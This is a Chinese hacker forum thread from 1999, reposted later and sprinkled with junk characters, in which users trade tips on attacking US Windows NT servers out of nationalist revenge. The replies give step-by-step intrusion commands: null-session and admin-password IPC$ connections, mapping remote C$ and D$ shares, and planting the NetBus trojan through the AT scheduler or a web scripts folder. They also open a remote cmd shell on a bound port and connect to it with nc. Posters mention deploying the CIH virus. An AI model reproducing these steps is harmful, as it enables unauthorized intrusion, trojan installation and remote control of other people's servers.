《版主頁黑客工具和文章的幾個問題》中提到:
7 G: e {$ l$ Q; O+ b( L請教�����,從版主頁上載得PINGER��,GRINDER���,LETMEIN等�,卻不能用�,PINGER安裝后,明明安裝前文件有1M多�����,但安裝完后生成的文件夾中只有PINGER�����。EXE���,40多K���,運行PINGER,設置好IP�,點PING,彈出一個窗口(C++��。�����。。)�,說出錯,然后關閉了����,何故,是不是安裝有誤�����? 2�����。運行LETMEIN��,彈出以下錯誤:連接文件LETMEIN����。EXE到不存在的NETAPI32。DLL�;NETGROUPGETUSERS。 是否說明需要NETAPI32���。DLL文件���,哪里有該DLL。 3�。USAKILLER 的教學文章中提到需在WINNT4。0下運行以下步驟等��,是否要求我的操作系統(tǒng)也是WINNT4��。0 �,應該不是吧? 4�。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務器的操作系統(tǒng)為NT��? 太多的問題需高手回答�����,我花那么多的時間和金錢下載這幾M文件卻不能用����,實在窩囊哦, 強烈建議USAKILLER 等高手級的黑客寫更多的教學文章����,以提高我國黑客水平���。
1 V' h, e; v2 W1 b3 k9 L> 我的機子MMX166,WIN98�����,2�。5G,32M內(nèi)存�。
U) t% b& h' I' [- K S7 `0 Q4 M" V2 u$ ^, [) D
黑客并不神秘,你只要了解操作系統(tǒng)�����,學習一些操作系統(tǒng)的弱點�����,輔助相關的工具����,就可以成功。3 j. L! N! ?/ _4 B C
你的問題是���,pinger, grinder, letmein等工具必須要在NT上運行�,我們強烈建議,你一定要安裝NT�,對于你的機器配制,和我們現(xiàn)在差不多���,只是比你多了32M內(nèi)存����,2G硬盤��。3 x# s, @- |; g
其實��,攻擊敵站���,利用其操作系統(tǒng)本身的工具就可以了,比如�����,我們在NT上攻擊某服務器�,該服務器為NT4.0,我們將做如下簡單事情就有可能成功����,假設目標NT的IP地址為111.111.111.111�,做法如下:; h0 ~% `+ H1 ]) b0 W
net use \\111.111.111.111\ipc$ "" /user:""3 K% [4 s$ \+ r ^$ K1 u9 u m$ x
net.exe是NT的工具文件�,該命令將和目標服務器建立Null Session,如果成功�,你可以查看該服務器上的共享目錄:
! O7 b" L8 S5 t4 @/ Mnet view \\111.111.111.111
% V ?. l2 R, @+ V; z) J: [當然,如果你有該NT管理員密碼��,就更好辦了����,假設其管理員Admin密碼為fuck:. \4 ~6 t, U$ _% q6 c1 c, [9 q3 ] ^
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
* a. ~, A; R @0 H命令成功后,幾乎所有目標NT上的配制��,資源���,你都可以在你本地NT上連接遠程計算機來查看或修改:" }6 w8 g5 V5 b( t4 B! U& z8 _7 s
1���、查看或修改遠程機器上的硬盤,假如目標NT上有C��、D兩個硬盤:, K4 X' ] k/ W/ K
net use x: \\111.111.111.111\c$
4 a, R3 O6 I+ f/ _. @. Knet use y: \\111.111.111.111\d$
' k9 {1 [9 `# z這樣��,目標NT上的C����、D盤分別被影射為你本地的X�����、Y盤��,你想怎么做都可以... u3 z9 o/ W5 _* t
2�、管理目標NT的用戶:
8 L9 l" I4 S' F, { h( S& S從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
5 O/ E2 n8 a. h6 `鍵入\\111.111.111.111后�����,目標NT上的所有用戶你想怎么做都可以�,和管理你本地的一樣
$ z* B+ q* k) O3�、管理目標NT的服務
: n! d! O/ v' _$ \3 ] V選擇“管理工具(公用)”->“服務器管理”->“計算機”->“選擇域”
9 r1 _2 ^! y$ {+ p9 j5 P這樣你可以管理目標NT上的服務,共享目錄
# \# w) w0 P6 Z9 D s \4��、IIS管理! G5 J+ j7 s$ p' `$ a* i8 `
選擇“Microsoft Internet Service管理”->“Internet 服務管理器”->"連接到服務器"->111.111.111.111$ G0 m9 S) N: ]' k1 D' I1 u. n
目標NT的FTP����、WWW服務你就可以重新配置
' I a0 {: Z4 h) S: P/ R: d5、事件管理) a" h$ K5 z- Y4 x
“事件查看器”->連接到服務器->111.111.111.111- [6 @+ B& L; B. L; F: Q2 t
9 o5 t" |2 s" ?$ r6 G @4 A* q
還有更多的東西���,都可以用NT本身的功能來完成���,這些都是95, 98所不能實現(xiàn)的�。2 M* t8 O6 X* K1 R3 q' l
7 }/ ?6 d5 k! Z9 Q: `) Y3 |
當然�,98,95也能做一些事情,但很麻煩���,比如:* ~% J$ `- ]! n o* z
net use \\111.111.111.111\ipc$
* @; Q- m$ d2 v& b6 Unet use z: \\111.111.111.111\d$
6 X- E; f F; S! C# \8 R6 J* Z- X% W但其后不能帶參數(shù)���,即改用其他用戶或密碼,系統(tǒng)將用當前用戶和密碼去登錄���,如果你知道目標NT的用戶或密碼����,重新啟動95, 98�����,改用該用戶和密碼登錄�����,方可實現(xiàn)�,你可以連接目標NT上的共享資源��,但不能進行管理����,如用戶����、事件等, P: t! i6 e% B3 e+ M; ]4 `
* y, N: _3 Q+ G; @1 i7 i我們強烈建議各位有心要為死難者報仇,真正的想黑霉國的站點���,花點時間�����,裝個NT吧�����,NT Workstation也可以!3 @' _' I5 A7 |7 A
這樣���,你還可以了解目標機器上能有什么東東供你去用����!1 ^" H! ^# ^! X1 A
, m. O: Z8 W p' x; J0 f
" E2 [/ ~; z6 Y--------------------------------------------------------------------------------# u' `* F% Z! ?8 P0 O
9 E$ }1 _8 h% B" W4 N
>quack于1999-06-12,23:37:44
" t! W5 b" A0 }- i, }9 D$ k* D在大作《幾個有關黑的問題》中提到:
/ K, F6 `9 F+ H) l首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機器名的是否可以直接進入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機的東東上去,而未傳NETBUS,可否直接在其機了運行此東東使其當堂暴斃?--我曾用LEGION上美國機子,但運行程序時卻是在我的機上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!�����。
8 ~( |7 d. m: ^; i+ a/ q7 A
, }) x, l2 E0 U* _5 t) fkillusa于1999-06-13�����,03:25:15
0 x( R0 t" l! r# Q在大作《Re: 幾個有關黑的問題》中提到:. _& J. i% Y i/ q+ m }
* {$ r, }9 b- B) Y. pletmein.exe 暫時沒有mypwd參數(shù)�����,十分抱歉
3 C3 T& l5 P2 b4 b( p$ vpinger程序��,只是利用ping來尋找主機���,每臺NT服務器有一個主IP地址���,但也可以設置多個輔助IP地址,比如有些服務器供應商����,一臺NT服務器上可以設置一千多個IP,每個IP對應一個Hostname,而真正能找到主機名的只有一個IP地址�,就是該主機的主IP地址����,所以有時顯示只有IP�����,而無主機名�。另外,有些服務器是非NT的操作系統(tǒng)���,有時將不會顯示主機名�����。當然���,有時在服務器上進行一些設置,也會出現(xiàn)上面的情況�。
+ `- v5 w! F" j: ]$ d5 @7 M5 Z& F6 {
Netbus分客戶端程序ntsrv.exe和服務器端netbus.exe兩個程序,所以��,netbus.exe是不用上傳的�,只需在目的6 {+ E' [# {3 r" s* w
服務器上運行ntsrv.exe���,而在目的服務器運行該程序有很多種方法:" a' d( L# H) ~, w' C( l
* s& ^( x* L- A' Y+ W, w
1��、利用服務器的 Schedule 服務來啟動schedule 服務是指在服務器上定時運行某程序���,具體使用方法�,可在自己的NT Dos窗口下鍵入以下:
9 @2 Q; p# v; ^! i; ^) `
( Y" h. g- m) {4 x7 i% E6 V9 kC:\>net start schedule6 n/ i3 C0 U. C: S' K! y0 W" z4 w
Schedule 正在啟動服務.....0 q( S/ j( \: J* r0 z( Y
Schedulw 服務啟動成功���。
, V6 L& I& e- w2 J% {C:\>at /?& ?# @ _0 {3 j" ^
AT 命令排定在特定的日期和時間運行某些命令和程序�����。
; _, F# R W* \* E& P運行 AT 命令之前必須先啟動 Schedule 服務�����。
; {# A3 n8 j; [- X7 B
3 W& m; t. E1 Q$ m6 N& EAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
0 Z" [3 t' I% T- s- B" e7 rAT [\\computername] time [/INTERACTIVE]/ ~0 {3 M. d" H1 ~
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
$ a6 T) {& C1 [/ L- v9 b1 y* y* u
: }! ~/ ]# G) d0 u2 S\\computername 指定遠程計算機��。 如果省略這個參數(shù)
: y8 M6 y6 L O7 [. S" t7 F1 @命令會被排定在本機上運行���。
% }8 ]" [. S: \* z5 L, ]id 指定給排定進度命令的識別號。3 g' Q: N, E0 r, y- F9 n8 S+ q
, ?) J( S Y. ]" R' U1 ]1 s% Y2 _
/delete 刪除某個已排定進度的命令��。如果省略標識�,計算機上所有已排定進度的命令都會被刪除����。/ C% [1 k0 ?& c- W: |
/yes 用于刪除所有作業(yè)�����,且不想在運行刪除時顯示確認信息 ��。
, ?- S3 g. m$ i! N% j! L6 j$ W" Ctime 指定命令運行的時間���。7 m( Y1 M( g( o
/interactive 允許作業(yè)在運行時��,與用戶通過桌面交互�����。0 a0 i, q/ ~3 k/ `* P* w1 W
! r4 V. ~4 e i% P2 Q/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令�����。
# g& ~; B6 D9 B9 ?; g& L* T如果省略日期���,則默認為在每月的本日運行。* I8 L b8 k. m# Z0 z
5 w# G+ _: {. G7 v X
/next:date[,...] 指定在下一個指定日期 (如��,下周三)��,運行命令�。如果省略日期,則默認為在每月的本日運行��。6 |1 e3 X0 ?- P: W! o1 y% u( J' Q
7 E( m$ K6 L( t# p; c"command" 準備運行的 Windows NT 命令或批處理文件���。7 e% J. A! D$ |, A$ I0 R9 x
y" m4 [9 a5 I% f% q. j5 V QC:\>3 E7 z# U7 P$ X
# e( j' m. E4 W" E2 F! l知道了如何使用AT�,再來看看如何在遠程NT上運行ntsrv.exe:" @* F* I0 S* E
1 利用管理員登陸到目的服務器��,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
& i1 a" ^1 F/ T/ Q1 U3 }0 J# W7 j2 利用ntsrv.exe啟動遠程: netsvc \\x.x.x.x schedule /start
# v9 J& \: C2 b/ G* h7 a3 利用AT.EXE在遠程服務器設置程序定時運行���,當然最快運行最理想��,所以���,你可以用letmein.exe得到服務器的時間,然后:0 P0 D! O8 n& g, R- i
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
: O$ M4 a, w/ w1 x6 w其中00:00要改為用letmein.exe得回來的具體時間+一點容量���,等一會后����,再在本地啟動netbus.exe,鍵入目的服務器得ip地址或hostname�����,連接���!具體使用可參照 "How to get in nt"�����,比如第一種方法�,你想要在目的服務器運行 LEGION��,可以利用netbus得上傳功能�,將LEGION上傳至目的服務器,再用netbus的"Start program"�����,鍵入完整路徑的LEGION運行程序����,就ok了!第二種方法是利用netbus的“App redirect”功能,啟動遠程telnet服務��,如下:在netbus中擊“App redirect”���,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321��,服務就啟動了���,然后在本地運行:nc x.x.x.x 4321��,出現(xiàn)dos啟動的畫面就表示連接成功:; M. l* _9 P$ W0 D9 C% R, _+ H
Microsoft(R) Windows NT(TM)- G& y! _! g3 g; F F7 e. p# y$ {6 i7 M
(C) Copyright 1985-1996 Microsoft Corp.
& \" T* W% p3 t6 @/ A0 n' A) vC:\>
. R4 M" S. G7 j% F+ ^$ _7 }$ x8 O- @8 h& F: @9 I
2���、利用web啟動ntsrv.exe或其他程序在目的服務器& l4 p( e4 a( Y; L/ ?* S9 M, S8 p/ U
# H2 J2 B' f0 ~將ntsrv.exe 或其他運行程序Copy到目的服務器的www可執(zhí)行目錄,如cgi-bin或scripts��,然后在瀏覽器鍵入url如:: M q, i! G) r4 K C/ x
http://x.x.x.x/scripts/ntsrv.exe /port:64321
% a6 [% B6 S. U+ v* `0 d或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
6 `" z+ p5 _" I" ~* g$ W. s該程序就啟動了
: g/ Q' S$ k$ p2 j0 Y* ?% i% l1 _
我只提這幾中方法���!
8 c/ n& R; @$ W0 X7 {2 {- C- t. }要成功��,必須打好基礎工���,對操作系統(tǒng)充分了解!7 F7 l+ N t: ~7 j$ J3 q
1 S% U$ }4 i$ b1 L
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡